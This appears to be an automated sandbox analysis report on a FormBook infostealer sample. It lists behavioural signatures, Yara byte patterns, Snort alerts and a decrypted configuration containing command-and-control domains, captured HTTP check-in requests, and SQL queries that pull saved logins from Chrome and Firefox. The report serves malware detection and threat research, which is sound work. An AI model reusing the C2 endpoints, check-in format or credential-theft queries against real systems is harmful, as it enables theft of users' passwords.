
Analysis Report YvGnm93rap.exe

Overview

General Information

Sample Name: YvGnm93rap.exe
Analysis ID: 339311
MD5: 16e1a5d26c0698ac48d63661264e0ba1
SHA1: 5e61d05157c4aa1acfc6a89de619f6bbcad176f6
SHA256: e4e84d03d4cb709d737f9ee3e69b40d797e452d83faa35f0a06bb78a87ad0984
Tags: exe, Formbook


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • YvGnm93rap.exe (PID: 2396 cmdline: 'C:\Users\user\Desktop\YvGnm93rap.exe' MD5: 16E1A5D26C0698AC48D63661264E0BA1)
    • YvGnm93rap.exe (PID: 6196 cmdline: {path} MD5: 16E1A5D26C0698AC48D63661264E0BA1)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 6460 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6564 cmdline: /c del 'C:\Users\user\Desktop\YvGnm93rap.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79df", "KEY1_OFFSET 0x1bbd0", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1bc26", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9f116468", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715052", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0122fe", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01475", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", 
"0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", 
".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "fakecostasunglasses.com", "twinbrothers.pizza", "jizhoujsp.com", "qscrit.com", "hotelmanise.com", "fer-ua.online", "europserver-simcloud.systems", "redwap2.pro", "betwalkoffame.com", "latashalovemillionaire.com", "8million-lr.com", "tomatrader.com", "modaluxcutabovefitness.com", "shishijiazu.com", "cckytx.com", "reversehomeloansmiami.com", "imaginenationnetwork.com", "thecyclistshop.com", "jorgegiljewelry.com", "hlaprotiens.com", "biblecourt.com", "puzelhome.com", "musicbychristina.com", "iregentos.info", "ephwehemeral.com", "qubeeva.com", "healingwithkarlee.com", "giftasmile2day.com", "ondesign03.net", "argusproductionsus.com", "tootleshook.com", "sukien-freefire12.com", "windmaske.com", "futbolclubbarcelona.soccer", "veteransc60.com", "steambackpacktrade.info", "zingnation.com", "myfoodworldcup.com", "playitaintso.net", "crafteest.com", "deutschekorrosionsschutz.net", "streamcommunitty.com", "gatehess.com", "hechoenvegas.net", "4037a.com", "santanabeautycares.com", "100feetpics.com", "johnsroadantiques.com", "improve-climbing.com", "18shuwu.net", "amazon-support-recovery.com", "vibrarecovery.com", "deskdonors.info", "triagggroup.com", "probysweden.com", "helloinward.com", "vvardown.com", "kicksends.com", "alwayadopt.com", "modernappsllc.com", "itswooby.com", 
"med.vegas", "chadwestconsulting.com", "africanosworld.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.bodyfuelrtd.com/8rg4/\u0000"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.YvGnm93rap.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.YvGnm93rap.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.YvGnm93rap.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
2.2.YvGnm93rap.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.YvGnm93rap.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 2.2.YvGnm93rap.exe.400000.0.unpack, Malware Configuration Extractor: FormBook (the extracted configuration is listed in full under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: YvGnm93rap.exe, Virustotal: Detection: 46%
Source: YvGnm93rap.exe, ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match, File source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: YvGnm93rap.exe, Joe Sandbox ML: detected
Source: 2.2.YvGnm93rap.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: YvGnm93rap.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: YvGnm93rap.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msiexec.pdb source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
Source: Binary string: msiexec.pdbGCTL source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: YvGnm93rap.exe, 00000002.00000003.226603868.0000000000BA0000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: YvGnm93rap.exe
Source: C:\Users\user\Desktop\YvGnm93rap.exe, Code function: 4x nop then pop ebx, 2_2_00406A98
Source: C:\Users\user\Desktop\YvGnm93rap.exe, Code function: 4x nop then pop edi, 2_2_0040C3EB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49729 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49729 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49729 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49763 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49763 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49763 -> 34.102.136.180:80
Source: global traffic, HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1 | Host: www.100feetpics.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1 | Host: www.reversehomeloansmiami.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1 | Host: www.tomatrader.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1 | Host: www.futbolclubbarcelona.soccer | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1 | Host: www.ondesign03.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1 | Host: www.crafteest.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1 | Host: www.4037a.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1 | Host: www.puzelhome.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=A4ItsHP+WlrLG/knzE1FqdRUH2iuHEJ7BxsWyFaOnTa5UmbK6eGivqtSi2ljMDHkmrx5 HTTP/1.1 | Host: www.bodyfuelrtd.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View, IP Address: 34.102.136.180
Source: Joe Sandbox View, ASN Name: PEGTECHINCUS
Source: Joe Sandbox View, ASN Name: SUPERHOST-PL-ASPL
Source: Joe Sandbox View, ASN Name: LEASEWEB-NL-AMS-01NetherlandsNL
Source: unknown, DNS traffic detected: queries for: www.100feetpics.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Jan 2021 19:48:51 GMTContent-Type: text/htmlContent-Length: 1417Connection: closeVary: Accept-EncodingLast-Modified: Wed, 05 Aug 2020 09:00:18 GMTETag: "589-5ac1d99d73c92"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 
3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33
            Source: explorer.exe, 00000003.00000000.249758668.000000000F5C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
